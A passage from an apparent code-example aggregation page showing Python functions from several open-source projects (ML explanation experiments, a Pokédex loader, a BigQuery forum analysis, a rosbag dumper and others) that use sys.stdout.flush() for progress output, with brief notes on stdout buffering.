    train_idx, test_idx = tuple(cross_validation.ShuffleSplit(dirty_train_vectors.shape[0], 1, 0.2))[0]
    train_acc1 = train_acc2 = test_acc1 = test_acc2 = 0
    print 'Trying to find trees:'
    sys.stdout.flush()
    iteration = 0
    found_tree = True
    while np.abs(train_acc1 - train_acc2) > 0.001 or np.abs(test_acc1 - test_acc2) < 0.05: 
      iteration += 1
      c1.fit(dirty_train_vectors[train_idx], train_labels[train_idx])
      c2.fit(dirty_train_vectors[train_idx], train_labels[train_idx])
      train_acc1 = accuracy_score(train_labels[test_idx], c1.predict(dirty_train_vectors[test_idx]))
      train_acc2 = accuracy_score(train_labels[test_idx], c2.predict(dirty_train_vectors[test_idx]))
      test_acc1 = accuracy_score(test_labels, c1.predict(test_vectors))
      test_acc2 = accuracy_score(test_labels, c2.predict(test_vectors))
      if iteration == 3000:
        found_tree = False
        break
    if not found_tree:
      print 'skipping iteration', Z
      continue
    print 'done'
    print 'Train acc1:', train_acc1, 'Train acc2:', train_acc2
    print 'Test acc1:', test_acc1, 'Test acc2:', test_acc2
    sys.stdout.flush()
    predictions = c1.predict(dirty_train_vectors)
    predictions2 = c2.predict(dirty_train_vectors)
    predict_probas = c1.predict_proba(dirty_train_vectors)[:,1]
    predict_probas2 = c2.predict_proba(dirty_train_vectors)[:,1]
    cv_preds1 = cross_validation.cross_val_predict(c1, dirty_train_vectors[train_idx], train_labels[train_idx], cv=5)
    cv_preds2 = cross_validation.cross_val_predict(c2, dirty_train_vectors[train_idx], train_labels[train_idx], cv=5)
    parzen1.fit(dirty_train_vectors[train_idx], cv_preds1)
    parzen2.fit(dirty_train_vectors[train_idx], cv_preds2)
    pp = []
    pp2 = []
    true_labels = []
    iteration = 0
    for i in test_idx:
      if iteration % 50 == 0:
        print iteration
        sys.stdout.flush()
      iteration += 1
      pp.append(predict_probas[i])
      pp2.append(predict_probas2[i])
      true_labels.append(train_labels[i])
      exp, mean = local.explain_instance(dirty_train_vectors[i], 1, c1.predict_proba, args.num_features)
      exps1['lime'].append((exp, mean))

      exp = parzen1.explain_instance(dirty_train_vectors[i], 1, c1.predict_proba, args.num_features, None) 
      mean = parzen1.predict_proba(dirty_train_vectors[i])[1]
      exps1['parzen'].append((exp, mean))

      exp = random.explain_instance(dirty_train_vectors[i], 1, None, args.num_features, None)
      exps1['random'].append(exp)

      exp = explainers.explain_greedy_martens(dirty_train_vectors[i], predictions[i], c1.predict_proba, args.num_features)
      exps1['greedy'].append(exp)


      # Classifier 2
      exp, mean = local.explain_instance(dirty_train_vectors[i], 1, c2.predict_proba, args.num_features)
      exps2['lime'].append((exp, mean))

      exp = parzen2.explain_instance(dirty_train_vectors[i], 1, c2.predict_proba, args.num_features, None) 
      mean = parzen2.predict_proba(dirty_train_vectors[i])[1]
      exps2['parzen'].append((exp, mean))

      exp = random.explain_instance(dirty_train_vectors[i], 1, None, args.num_features, None)
      exps2['random'].append(exp)

      exp = explainers.explain_greedy_martens(dirty_train_vectors[i], predictions2[i], c2.predict_proba, args.num_features)
      exps2['greedy'].append(exp)

    out = {'true_labels' : true_labels, 'untrustworthy' : untrustworthy, 'train_acc1' :  train_acc1, 'train_acc2' : train_acc2, 'test_acc1' : test_acc1, 'test_acc2' : test_acc2, 'exps1' : exps1, 'exps2': exps2, 'predict_probas1': pp, 'predict_probas2': pp2}
    pickle.dump(out, open(os.path.join(args.output_folder, 'comparing_%s_%s_%d.pickle' % (dataset, args.num_features, Z + args.start_id)), 'w'))

Example 36

Project: pokedex Source File: load.py
def _get_verbose_prints(verbose):
    """If `verbose` is true, returns three functions: one for printing a
    starting message, one for printing an interim status update, and one for
    printing a success or failure message when finished.

    If `verbose` is false, returns no-op functions.
    """

    if not verbose:
        # Return dummies
        def dummy(*args, **kwargs):
            pass

        return dummy, dummy, dummy

    ### Okay, verbose == True; print stuff

    def print_start(thing):
        # Truncate to 66 characters, leaving 10 characters for a success
        # or failure message
        truncated_thing = thing[:66]

        # Also, space-pad to keep the cursor in a known column
        num_spaces = 66 - len(truncated_thing)

        print("%s...%s" % (truncated_thing, ' ' * num_spaces), end='')
        sys.stdout.flush()

    if sys.stdout.isatty():
        # stdout is a terminal; stupid backspace tricks are OK.
        # Don't use print, because it always adds magical spaces, which
        # makes backspace accounting harder

        backspaces = [0]
        def print_status(msg):
            # Overwrite any status text with spaces before printing
            sys.stdout.write('\b' * backspaces[0])
            sys.stdout.write(' ' * backspaces[0])
            sys.stdout.write('\b' * backspaces[0])
            sys.stdout.write(msg)
            sys.stdout.flush()
            backspaces[0] = len(msg)

        def print_done(msg='ok'):
            # Overwrite any status text with spaces before printing
            sys.stdout.write('\b' * backspaces[0])
            sys.stdout.write(' ' * backspaces[0])
            sys.stdout.write('\b' * backspaces[0])
            sys.stdout.write(msg + "\n")
            sys.stdout.flush()
            backspaces[0] = 0

    else:
        # stdout is a file (or something); don't bother with status at all
        def print_status(msg):
            pass

        def print_done(msg='ok'):
            print(msg)

    return print_start, print_status, print_done
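
The reason load.py flushes after every sys.stdout.write is that the backspace trick never emits a newline, so nothing would reach a line-buffered terminal until much later, and the trick is only attempted when stdout is a TTY. A self-contained sketch of the same in-place status idea (run_with_status and the task names are made up for illustration):

import sys
import time

def run_with_status(tasks):
    width = 0
    for name, work in tasks:
        # Erase the previous status, then write the new one on the same line.
        sys.stdout.write('\b' * width + ' ' * width + '\b' * width)
        sys.stdout.write(name)
        sys.stdout.flush()  # no newline is written, so flush or nothing shows up
        width = len(name)
        work()
    sys.stdout.write('\b' * width + ' ' * width + '\b' * width + 'ok\n')
    sys.stdout.flush()

if __name__ == '__main__':
    if sys.stdout.isatty():  # as in load.py, only do backspace tricks on a terminal
        run_with_status([('step one', lambda: time.sleep(0.3)),
                         ('step two', lambda: time.sleep(0.3))])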

Example 37

Project: acousticbrainz-server Source File: job_calc.py
Function: main
def main(num_threads, profile, dataset_job_id):
    print("High-level extractor daemon starting with %d threads" % num_threads)
    sys.stdout.flush()
    build_sha1 = get_build_sha1(HIGH_LEVEL_EXTRACTOR_BINARY)
    create_profile(profile, PROFILE_CONF, build_sha1)
    db.init_db_engine(config.SQLALCHEMY_DATABASE_URI)

    model_id = get_model_from_eval(dataset_job_id)
    includes = load_includes_from_eval(dataset_job_id)

    num_processed = 0

    pool = {}
    docs = []
    while True:
        # Check to see if we need more database rows
        if len(docs) == 0:
            # Fetch more rows from the DB
            docs = db.data.get_unprocessed_highlevel_documents_for_model(model_id, includes)

            # We will fetch some rows that are already in progress. Remove those.
            in_progress = pool.keys()
            filtered = []
            for mbid, doc, id in docs:
                if id not in in_progress:
                    filtered.append((mbid, doc, id))
            docs = filtered

        if len(docs):
            # Start one document
            mbid, doc, id = docs.pop()
            th = HighLevel(mbid, doc, id)
            th.start()
            print("start %s" % id)
            sys.stdout.flush()
            pool[id] = th

        # If we're at max threads, wait for one to complete
        while True:
            if len(pool) == 0 and len(docs) == 0:
                if num_processed > 0:
                    print("processed %s documents, none remain. Sleeping." % num_processed)
                    sys.stdout.flush()
                num_processed = 0
                # Let's be nice and not keep any connections to the DB open while we nap
                # TODO: Close connections when we're sleeping
                sleep(SLEEP_DURATION)

            for id in pool.keys():
                if not pool[id].is_alive():

                    # Fetch the data and clean up the thread object
                    hl_data = pool[id].get_data()
                    ll_id = pool[id].get_ll_id()
                    pool[id].join()
                    del pool[id]

                    try:
                        jdata = json.loads(hl_data)
                    except ValueError:
                        print("error %s: Cannot parse result document" % mbid)
                        print(hl_data)
                        sys.stdout.flush()
                        jdata = {}

                    db.data.write_high_level(mbid, ll_id, jdata, build_sha1)

                    print("done  %s" % id)
                    sys.stdout.flush()
                    num_processed += 1

            if len(pool) == num_threads:
                # tranquilo! (take it easy)
                sleep(.1)
            else:
                break
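
job_calc.py is a long-running daemon whose output is typically redirected to a log file, and a redirected stdout is block-buffered, which is why every print is followed by sys.stdout.flush() so the log can be tailed live. A general alternative, sketched below for Python 3.7+ and not something job_calc.py itself does, is to switch the stream to line buffering once at startup instead of flushing at every call site; running the interpreter with -u or setting PYTHONUNBUFFERED=1 has a similar effect:

import sys

# Reconfigure stdout once so every completed line is flushed automatically,
# even when the daemon's output goes to a file or pipe.
if hasattr(sys.stdout, 'reconfigure'):  # io.TextIOWrapper.reconfigure, Python 3.7+
    sys.stdout.reconfigure(line_buffering=True)

print('daemon starting')  # no explicit flush needed after reconfiguring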

Example 38

Project: nrvr-commander Source File: download.py
    @classmethod
    def fromUrl(cls, url,
                force=False,
                dontDownload=False,
                ticker=True):
        """Download file or use previously downloaded file.
        
        As implemented uses urllib2.
        
        dontDownload
            whether you don't want to start a download, for some reason.
        
        Return file path."""
        urlFilename = cls.basename(url)
        downloadDir = ScriptUser.loggedIn.userHomeRelative("Downloads")
        downloadPath = os.path.join(downloadDir, urlFilename)
        semaphorePath = downloadPath + cls.semaphoreExtenstion
        #
        if os.path.exists(downloadPath) and not force:
            if not os.path.exists(semaphorePath):
                # file exists and not download in progress,
                # assume it is good
                return downloadPath
            else:
                # file exists and download in progress,
                # presumably from another script running in another process or thread,
                # wait for it to complete
                printed = False
                ticked = False
                # check the essential condition, initially and then repeatedly
                while os.path.exists(semaphorePath):
                    if not printed:
                        # first time only printing
                        print "waiting for " + semaphorePath + " to go away on completion"
                        sys.stdout.flush()
                        printed = True
                    if ticker:
                        if not ticked:
                            # first time only printing
                            sys.stdout.write("[")
                        sys.stdout.write(".")
                        sys.stdout.flush()
                        ticked = True
                    time.sleep(5)
                if ticked:
                    # final printing
                    sys.stdout.write("]\n")
                    sys.stdout.flush()
        elif not dontDownload: # it is normal to download
            if not os.path.exists(downloadDir): # possibly on an international version OS
                try:
                    os.makedirs(downloadDir)
                except OSError:
                    if os.path.exists(downloadDir): # concurrently made
                        pass
                    else: # failure
                        raise
            #
            # try downloading
            pid = os.getpid()
            try:
                with open(semaphorePath, "w") as semaphoreFile:
                    # create semaphore file
                    semaphoreFile.write("pid=" + str(pid))
                #
                print "looking for " + url
                # open connection to server
                urlFileLikeObject = urllib2.urlopen(url)
                with open(downloadPath, "wb") as downloadFile:
                    print "starting to download " + url
                    if ticker:
                        sys.stdout.write("[")
                    # was shutil.copyfileobj(urlFileLikeObject, downloadFile)
                    try:
                        while True:
                            data = urlFileLikeObject.read(1000000)
                            if not data:
                                break
                            downloadFile.write(data)
                            if ticker:
                                sys.stdout.write(".")
                                sys.stdout.flush()
                    finally:
                        if ticker:
                            sys.stdout.write("]\n")
                            sys.stdout.flush()
            except: # apparently a problem
                if os.path.exists(downloadPath):
                    # don't let a bad file sit around
                    try:
                        os.remove(downloadPath)
                    except:
                        pass
                print "problem downloading " + url
                raise
            else:
                print "done downloading " + url
            finally:
                try:
                    # close connection to server
                    urlFileLikeObject.close()
                except:
                    pass
                try:
                    # delete semaphore file
                    os.remove(semaphorePath)
                except:
                    pass
        if os.path.exists(downloadPath):
            # file exists now, assume it is good
            return downloadPath
        else:
            # apparently download has failed
            raise IOError("file not found " + downloadPath)
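
download.py prints '[' once, then one '.' per chunk, then a closing ']'; since none of those writes contains a newline, each one is flushed so the ticker actually advances while the download runs. A stripped-down sketch of that ticker around an arbitrary chunk iterator (copy_with_ticker and its arguments are illustrative, not taken from the original):

import sys

def copy_with_ticker(chunks, out_file, ticker=True):
    """Write each chunk to out_file, printing one dot per chunk."""
    if ticker:
        sys.stdout.write('[')
        sys.stdout.flush()
    try:
        for chunk in chunks:
            out_file.write(chunk)
            if ticker:
                sys.stdout.write('.')
                sys.stdout.flush()  # dots have no newline, so flush each one
    finally:
        if ticker:
            sys.stdout.write(']\n')
            sys.stdout.flush()

if __name__ == '__main__':
    import io
    copy_with_ticker([b'x' * 10] * 5, io.BytesIO())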

Example 39

Project: write-pythonic-code-demos Source File: _01_perf.py
def main():
    # #############################
    print("Creating data...", end=' ')
    sys.stdout.flush()

    data_list = []  # 500,000 DataPoint items
    random.seed(0)
    for d_id in range(500000):
        x = random.randint(0, 1000)
        y = random.randint(0, 1000)
        temp = random.randint(-10, 50)
        quality = random.random()
        data_list.append(DataPoint(d_id, x, y, temp, quality))

    print("done.")
    sys.stdout.flush()

    # Reordering data for random access
    print("Reordering data for random access ...", end=' ')
    sys.stdout.flush()

    data_list.sort(key=lambda d: d.quality)

    print("done.")

    # Create a set of random IDs to locate without duplication
    interesting_ids = {random.randint(0, len(data_list)) for _ in range(0, 100)}
    print("Creating {} interesting IDs to seek.".format(len(interesting_ids)))

    # Locating data in list
    print("Locating data in list...", end=' ')
    sys.stdout.flush()

    t0 = datetime.datetime.now()
    interesting_points = []
    for i in interesting_ids:
        pt = find_point_by_id_in_list(data_list, i)
        interesting_points.append(pt)

    t1 = datetime.datetime.now()
    dt_list = (t1 - t0).total_seconds()

    print("done.")
    sys.stdout.flush()

    print("dt: {} sec".format(dt_list))
    print(interesting_points)

    # #############################

    # let's try this with a dictionary...
    # 1. Create dictionary via comprehension, key = id

    t0 = datetime.datetime.now()
    data_dict = {d.id: d for d in data_list}

    # 2. locate the data in dictionary
    interesting_points.clear()
    for d_id in interesting_ids:
        d = data_dict[d_id]
        interesting_points.append(d)

    t1 = datetime.datetime.now()
    dt_dict = (t1 - t0).total_seconds()

    print("done.")
    sys.stdout.flush()

    print("dt: {} sec".format(dt_dict))
    print(interesting_points)
    print()
    print("Speedup from dict: {:,.0f}x".format(round(dt_list / dt_dict)))
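
_01_perf.py shows the other side of the same buffering detail: print("Creating data...", end=' ') suppresses the newline, and on an interactive (line-buffered) terminal it is the newline that triggers the flush, so without the explicit sys.stdout.flush() the prompt would stay invisible until "done." arrives after the slow loop. A minimal sketch of that start/done pattern (do_slow_work is a placeholder):

import sys
import time

def do_slow_work():
    time.sleep(1.0)  # stands in for the expensive part

print("Creating data...", end=' ')
sys.stdout.flush()  # no newline was printed, so force the prompt out now
do_slow_work()
print("done.")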

Example 40

Project: beacon-ml Source File: deep-learning.py
def main():
  if not os.path.exists(RESULTS_DIR):
    os.makedirs(RESULTS_DIR)

  # then run to generate the vectorized data from the raw dump (already done)
  if REGEN_DATA or \
      not os.path.exists(VECTOR_DATA_PATH) or \
      not os.path.exists(VECTOR_LABELS_PATH) or \
      not os.path.exists(VALUE_RANGES_PATH):
    print 'Re-generating data'
    csv_fname = os.path.join(DATA_DIR, CSV_FNAME)
    sys.stdout.flush()
    data, labels, ranges = subsample_and_vectorize_data(csv_fname, LABEL, PRETTY_PRINT_LABEL)
    with open(VECTOR_DATA_PATH, 'wb') as file:
      np.save(file, data)
    data = None
    with open(VECTOR_LABELS_PATH, 'wb') as file:
      np.save(file, labels)
    labels = None
    with open(VALUE_RANGES_PATH, 'wb') as file:
      json.dump(ranges, file, indent=4)
    ranges = None

  features = load_feature_names()
  (x_train_full, y_train), (x_val_full, y_val) = prepare_data()
  train_rows, train_cols = x_train_full.shape
  val_rows, val_cols = x_val_full.shape

  # Figure out how many columns we need for the known starting features
  fname = os.path.join(RESULTS_DIR, PRETTY_PRINT_LABEL + '_accuracy_test')
  base_columns = 0
  for name in starting_features:
    if name in features:
      fname += "." + name
      base_columns += features[name]['end'] - features[name]['start'] + 1
  fname += ".csv"

  # Try training each feature against the data set individually
  feature_count = len(features)
  feature_num = 0
  with open(fname, 'wb', 1) as out:
    for name, feature in features.iteritems():
      if not len(test_features) or name in test_features:
        feature_num += 1

        #Build an input data set with just the columns we care about
        count = feature['end'] - feature['start'] + 1
        x_train = np.zeros((train_rows, base_columns + count))
        x_val = np.zeros((val_rows, base_columns + count))
        col = 0
        # Populate the starting features
        for n in starting_features:
          if n == name:
            continue
          if n in features:
            for column in xrange(features[n]['start'], features[n]['end'] + 1):
              x_train[:, col] = x_train_full[:, column]
              x_val[:, col] = x_val_full[:, column]
              col += 1
        # Populate the features we are testing
        for column in xrange(feature['start'], feature['end'] + 1):
          x_train[:,col] = x_train_full[:,column]
          x_val[:, col] = x_val_full[:, column]
          col += 1

        # normalize the data
        scaler = StandardScaler()
        x_train = scaler.fit_transform(x_train)
        x_val = scaler.transform(x_val)

        # Run the actual training
        print '[{0:d}/{1:d}] Training deep model on {2} ({3:d} columns)'.format(feature_num, feature_count, name, col)
        sys.stdout.flush()
        acc, model = train_deep_model(x_train, y_train, x_val, y_val)
        print '{0} Accuracy: {1:0.4f}'.format(name, acc)
        sys.stdout.flush()
        out.write('{0},{1:0.4f}\n'.format(name,acc))

        # Test the various values for the feature
        if len(test_features):
          max_val = 100000
          min_val = 100
          step_size = 100
          count = (max_val - min_val) / step_size
          original_values = np.array([[0.0]] * count)
          row = 0
          for value in xrange(100, 100000, 100):
            original_values[row] = value
            row += 1
          data = scaler.transform(original_values)
          prob = model.predict_proba(data, verbose=0)
          with open(os.path.join(RESULTS_DIR, PRETTY_PRINT_LABEL + '_values_' + name), 'wb') as v:
            for row in xrange(0, count):
              value = original_values[row][0]
              probability = prob[row][0]
              v.write('{0:d},{1:f}\n'.format(int(value), probability))

Example 41

Project: edx2bigquery Source File: make_forum_analysis.py
def CreateForumPerson( course_id, force_recompute=False, use_dataset_latest=False, skip_last_day=False, end_date=None, has_hash_limit=False, hash_limit=HASH ):
    '''
    Create Forum Person table, based on forum events and forum posts tables. 
    This table contains both read and writes for all forum posts, for all users.
    '''

    dataset = bqutil.course_id2dataset(course_id, use_dataset_latest=use_dataset_latest)
    table = TABLE_FORUM_PERSON

    original_the_sql = """

                  SELECT (case when PP.username_fp is not null then PP.username_fp else FE.username_fe end) as username,
                         "{course_id}" as course_id,
                         (case when PP.username_fp is not null then PP.slug_id else FE.slug_id end) as slug_id,
                         (case when PP.username_fp is not null then PP.slug_type else FE.slug_type end) as slug_type,
                         (case when PP.username_fp is not null then PP.thread_id else FE.thread_id end) as thread_id,
                         (case when PP.username_fp is not null then PP.parent_id else FE.parent_id end) as parent_id,
                         (case when PP.original_poster is not null then PP.original_poster else FE.original_poster end) as original_poster,
                         (case when PP.responded_to is not null then PP.responded_to else FE.responded_to end) as responded_to,
                         (case when PP.username_fp is not null then PP.title else FE.title end) as title,
                         (case when PP.username_fp is not null then PP.wrote else 0 end) as wrote,
                         FE.read as read,
                         FE.pin as pinned,
                         FE.upvote as upvoted,
                         FE.unvote as unvoted,
                         #FE.del as deleted,
                         FE.follow as followed,
                         (case when PP.first_time is not null and FE.last_time is not null and (TIMESTAMP(PP.first_time) <= TIMESTAMP(FE.last_time))
                                   then TIMESTAMP(PP.first_time)
                               else (case when PP.first_time is not null and FE.last_time is null
                                     then TIMESTAMP(PP.first_time) else
                                         (case when FE.first_time is not null
                                               then TIMESTAMP(FE.first_time)
                                              else FE.last_time end) end) end) as first_time,
                         (case when PP.first_time is not null and FE.last_time is not null and (TIMESTAMP(PP.first_time) >= TIMESTAMP(FE.last_time))
                                   then TIMESTAMP(PP.first_time)
                               else (case when PP.first_time is not null and FE.last_time is null
                                     then TIMESTAMP(PP.first_time) else
                                         (case when FE.last_time is not null
                                               then TIMESTAMP(FE.last_time)
                                              else FE.first_time end) end) end) as last_time,


                  FROM
                  (
                          # Find 1st level posting => "original_post"
                          SELECT username as username_fp,
                                 slug_id,
                                 slug_type,
                                 thread_id,
                                 parent_id,
                                 original_poster,
                                 responded_to,
                                 title,
                                 1 as wrote,
                                 #created_at as first_time,
                                 first_time
                          FROM [{dataset}.{forum_posts}]
                          {hash_limit_where}
                          ORDER by username_fp, first_time
                  ) PP
                  FULL OUTER JOIN EACH
                  (
                          SELECT username as username_fe, 
                                 MIN(TIMESTAMP(time)) as first_time,
                                 MAX(TIMESTAMP(time)) as last_time,
                                 slug_id,
                                 FE.thread_id as thread_id,
                                 FIRST(parent_id) as parent_id,
                                 F.slug_type as slug_type,
                                 F.original_poster as original_poster,
                                 F.responded_to as responded_to,
                                 F.title as title,
                                 #1 as read,
                                 sum(case when forum_action = "read" or forum_action = "read_inline" then 1 else 0 end) as read,
                                 sum(case when forum_action = "pin" then 1 else 0 end) as pin,
                                 sum(case when forum_action = "upvote" then 1 else 0 end) as upvote,
                                 sum(case when forum_action = "unvote" then 1 else 0 end) as unvote,
                                 #sum(case when forum_action = "delete" then 1 else 0 end) as del,
                                 sum(case when forum_action = "follow_thread" then 1 else 0 end) as follow,      
                          FROM [{dataset}.{forum_events}] FE
                          JOIN EACH 
                          (
                                 SELECT username as username_fe,
                                        slug_id,
                                        slug_type,
                                        thread_id,
                                        parent_id,
                                        original_poster,
                                        responded_to,
                                        title,
                                        first_time,
                                 FROM [{dataset}.{forum_posts}]
                                 {hash_limit_where}
                          ) as F
                          ON F.thread_id = FE.thread_id
                          WHERE ((FE.forum_action = "read") or 
                                (FE.forum_action = "read_inline") or
                                (FE.forum_action = "pin") or 
                                (FE.forum_action = "upvote") or 
                                (FE.forum_action = "unvote") or
                                #(FE.forum_action = "delete") or
                                (FE.forum_action = "follow_thread"))
                                {hash_limit_and}
                          GROUP BY username_fe, slug_id, thread_id, slug_type, original_poster, responded_to, title
                  ) as FE
                  ON (PP.username_fp = FE.username_fe) AND (PP.slug_id = FE.slug_id)
                  WHERE (PP.username_fp is not null and PP.username_fp != '') or (FE.username_fe is not null and FE.username_fe != '')

              """

    the_sql = original_the_sql.format( dataset=dataset, course_id=course_id, forum=TABLE_FORUM, forum_posts=TABLE_FORUM_POSTS, forum_events=TABLE_FORUM_EVENTS, hash_limit_and='', hash_limit_where='' )

    print "[make_forum_analysis] Creating %s.%s table for %s" % (dataset, TABLE_FORUM_PERSON, course_id)
    sys.stdout.flush()

    try:

        tinfo_fe = bqutil.get_bq_table_info( dataset, TABLE_FORUM_EVENTS )
        trows_fe = int(tinfo_fe['numRows'])
        print "[make_forum_analysis] %s Forum Events found " % trows_fe
        tinfo_fp = bqutil.get_bq_table_info( dataset, TABLE_FORUM_POSTS )
        trows_fp = int(tinfo_fp['numRows'])
        print "[make_forum_analysis] %s Forum Posts found " % trows_fp

        assert tinfo_fe is not None and trows_fe != 0, "[make_forum_analysis] %s table depends on %s, which does not exist" % ( TABLE_FORUM_PERSON, TABLE_FORUM_EVENTS )
        assert tinfo_fp is not None and trows_fp != 0, "[make_forum_analysis] %s table depends on %s, which does not exist" % ( TABLE_FORUM_PERSON, TABLE_FORUM_POSTS ) 

    except (AssertionError, Exception) as err:

        print " --> Err: missing %s.%s and/or %s (including 0 rows in table)?  Skipping creation of %s" % ( dataset, TABLE_FORUM_POSTS, TABLE_FORUM_EVENTS, TABLE_FORUM_PERSON )
        sys.stdout.flush()
        return

    # Now try to create table
    try:

        if has_hash_limit:

            overwrite = True
            hash_limit = int( hash_limit )
            for k in range( hash_limit ):
                hash_limit_where = "WHERE ABS(HASH(username)) %% %d = %d" % ( hash_limit, k )
                hash_limit_and = "and ABS(HASH(username)) %% %d = %d" % ( hash_limit, k )

                retry_the_sql = original_the_sql.format( dataset=dataset, forum=TABLE_FORUM, forum_posts=TABLE_FORUM_POSTS, forum_events=TABLE_FORUM_EVENTS, hash_limit_and=hash_limit_and, hash_limit_where=hash_limit_where )
                print "[make_forum_analysis] Retrying with this query...", retry_the_sql
                sys.stdout.flush()
                bqutil.create_bq_table( dataset, table, retry_the_sql, wait=True, overwrite=overwrite, allowLargeResults=True )
                overwrite = "append"

        else:

            overwrite = True
            bqutil.create_bq_table(dataset, table, the_sql, wait=True, overwrite=overwrite, allowLargeResults=True)

    except Exception as err:

        has_hash_limit = True
        if ( (('Response too large to return.' in str(err)) or ('Resources exceeded during query execution' in str(err))) and has_hash_limit ):

            # 'Resources exceeded during query execution'
            # try using hash limit on username
            # e.g. WHERE ABS(HASH(username)) % 4 = 0
            print '[make_forum_analysis] Response too large to return. Attempting to break down into multiple queries and append instead... using hash of %s' % hash_limit

            try:

                for k in range( hash_limit ):

                    hash_limit_where = "WHERE ABS(HASH(username)) %% %d = %d" % ( hash_limit, k )
                    hash_limit_and = "and ABS(HASH(username)) %% %d = %d" % ( hash_limit, k )

                    retry_the_sql = original_the_sql.format( dataset=dataset, forum=TABLE_FORUM, forum_posts=TABLE_FORUM_POSTS, forum_events=TABLE_FORUM_EVENTS, hash_limit_and=hash_limit_and, hash_limit_where=hash_limit_where )
                    print "[make_forum_analysis] Retrying with this query...", retry_the_sql
                    sys.stdout.flush()
                    bqutil.create_bq_table( dataset, table, retry_the_sql, wait=True, overwrite=overwrite, allowLargeResults=True )
                    overwrite = "append"
  
            except Exception as err:

                if ( (('Response too large to return.' in str(err)) or ('Resources exceeded during query execution' in str(err))) and has_hash_limit ):

                    hash_limit = int( hash_limit * 2.0 )
                    print '[make_forum_analysis] Response too large to return. Attempting to break down into multiple queries and append instead... using hash of %s' % hash_limit
                    CreateForumPerson( course_id, force_recompute, use_dataset_latest, skip_last_day, end_date, has_hash_limit=True, hash_limit=hash_limit )

                else:

                    print '[make_forum_analysis] An error occurred with this query: %s' % the_sql
                    raise

        else:

            print '[make_forum_analysis] An error occurred with this query: %s' % the_sql
            raise

    print "Done with Forum Person for %s (end %s)"  % (course_id, datetime.datetime.now())
    print "="*77
    sys.stdout.flush()

    return

Example 42

Project: udacity-driving-reader Source File: bagdump.py
def main():
    parser = argparse.ArgumentParser(description='Convert rosbag to images and csv.')
    parser.add_argument('-o', '--outdir', type=str, nargs='?', default='/output',
        help='Output folder')
    parser.add_argument('-i', '--indir', type=str, nargs='?', default='/data',
        help='Input folder where bagfiles are located')
    parser.add_argument('-f', '--img_format', type=str, nargs='?', default='jpg',
        help='Image encode format, png or jpg')
    parser.add_argument('-d', dest='debug', action='store_true', help='Debug print enable')
    parser.set_defaults(debug=False)
    args = parser.parse_args()

    img_format = args.img_format
    base_outdir = args.outdir
    indir = args.indir
    debug_print = args.debug

    bridge = CvBridge()

    include_images = True
    filter_topics = [STEERING_TOPIC, GPS_FIX_TOPIC]
    if include_images:
        filter_topics += CAMERA_TOPICS

    bagsets = find_bagsets(indir, "*.bag", filter_topics)
    for bs in bagsets:
        print("Processing set %s" % bs.name)
        sys.stdout.flush()

        dataset_outdir = os.path.join(base_outdir, "%s" % bs.name)
        left_outdir = get_outdir(dataset_outdir, "left")
        center_outdir = get_outdir(dataset_outdir, "center")
        right_outdir = get_outdir(dataset_outdir, "right")

        camera_cols = ["seq", "timestamp", "width", "height", "frame_id", "filename"]
        camera_dict = defaultdict(list)

        steering_cols = ["seq", "timestamp", "angle", "torque", "speed"]
        steering_dict = defaultdict(list)

        gps_cols = ["seq", "timestamp", "status", "service", "lat", "long", "alt"]
        gps_dict = defaultdict(list)

        bs.write_infos(dataset_outdir)
        readers = bs.get_readers()
        stats_acc = defaultdict(int)

        def _process_msg(topic, msg, stats):
            timestamp = msg.header.stamp.to_nsec()
            if topic in CAMERA_TOPICS:
                outdir = camera_select(topic, (left_outdir, center_outdir, right_outdir))
                if debug_print:
                    print("%s_camera %d" % (topic[1], timestamp))

                results = write_image(bridge, outdir, msg, fmt=img_format)
                results['filename'] = os.path.relpath(results['filename'], dataset_outdir)
                camera2dict(msg, results, camera_dict)
                stats['img_count'] += 1
                stats['msg_count'] += 1

            elif topic == STEERING_TOPIC:
                if debug_print:
                    print("steering %d %f" % (timestamp, msg.steering_wheel_angle))

                steering2dict(msg, steering_dict)
                stats['msg_count'] += 1

            elif topic == GPS_FIX_TOPIC:
                if debug_print:
                    print("gps      %d %d, %d" % (timestamp, msg.latitude, msg.longitude))

                gps2dict(msg, gps_dict)
                stats['msg_count'] += 1

        # no need to cycle through readers in any order for dumping, rip through each one in sequence
        for reader in readers:
            for result in reader.read_messages():
                _process_msg(*result, stats=stats_acc)
                if stats_acc['img_count'] % 1000 == 0 or stats_acc['msg_count'] % 5000 == 0:
                    print("%d images, %d messages processed..." %
                          (stats_acc['img_count'], stats_acc['msg_count']))
                    sys.stdout.flush()

        print("Writing done. %d images, %d messages processed." %
              (stats_acc['img_count'], stats_acc['msg_count']))
        sys.stdout.flush()

        camera_csv_path = os.path.join(dataset_outdir, 'camera.csv')
        camera_df = pd.DataFrame(data=camera_dict, columns=camera_cols)
        camera_df.to_csv(camera_csv_path, index=False)

        steering_csv_path = os.path.join(dataset_outdir, 'steering.csv')
        steering_df = pd.DataFrame(data=steering_dict, columns=steering_cols)
        steering_df.to_csv(steering_csv_path, index=False)

        gps_csv_path = os.path.join(dataset_outdir, 'gps.csv')
        gps_df = pd.DataFrame(data=gps_dict, columns=gps_cols)
        gps_df.to_csv(gps_csv_path, index=False)

        gen_interpolated = True
        if gen_interpolated:
            # A little pandas magic to interpolate steering/gps samples to camera frames
            camera_df['timestamp'] = pd.to_datetime(camera_df['timestamp'])
            camera_df.set_index(['timestamp'], inplace=True)
            camera_df.index.rename('index', inplace=True)
            steering_df['timestamp'] = pd.to_datetime(steering_df['timestamp'])
            steering_df.set_index(['timestamp'], inplace=True)
            steering_df.index.rename('index', inplace=True)
            gps_df['timestamp'] = pd.to_datetime(gps_df['timestamp'])
            gps_df.set_index(['timestamp'], inplace=True)
            gps_df.index.rename('index', inplace=True)

            merged = functools.reduce(lambda left, right: pd.merge(
                left, right, how='outer', left_index=True, right_index=True), [camera_df, steering_df, gps_df])
            merged.interpolate(method='time', inplace=True)

            filtered_cols = ['timestamp', 'width', 'height', 'frame_id', 'filename',
                             'angle', 'torque', 'speed',
                             'lat', 'long', 'alt']
            filtered = merged.loc[camera_df.index]  # back to only camera rows
            filtered.fillna(0.0, inplace=True)
            filtered['timestamp'] = filtered.index.astype('int')  # add back original timestamp integer col
            filtered['width'] = filtered['width'].astype('int')  # cast back to int
            filtered['height'] = filtered['height'].astype('int')  # cast back to int
            filtered = filtered[filtered_cols]  # filter and reorder columns for final output

            interpolated_csv_path = os.path.join(dataset_outdir, 'interpolated.csv')
            filtered.to_csv(interpolated_csv_path, header=True)

Example 43

Project: edx2bigquery Source File: make_user_info_combo.py
def process_file(course_id, basedir=None, datedir=None, use_dataset_latest=False):

    basedir = path(basedir or '')
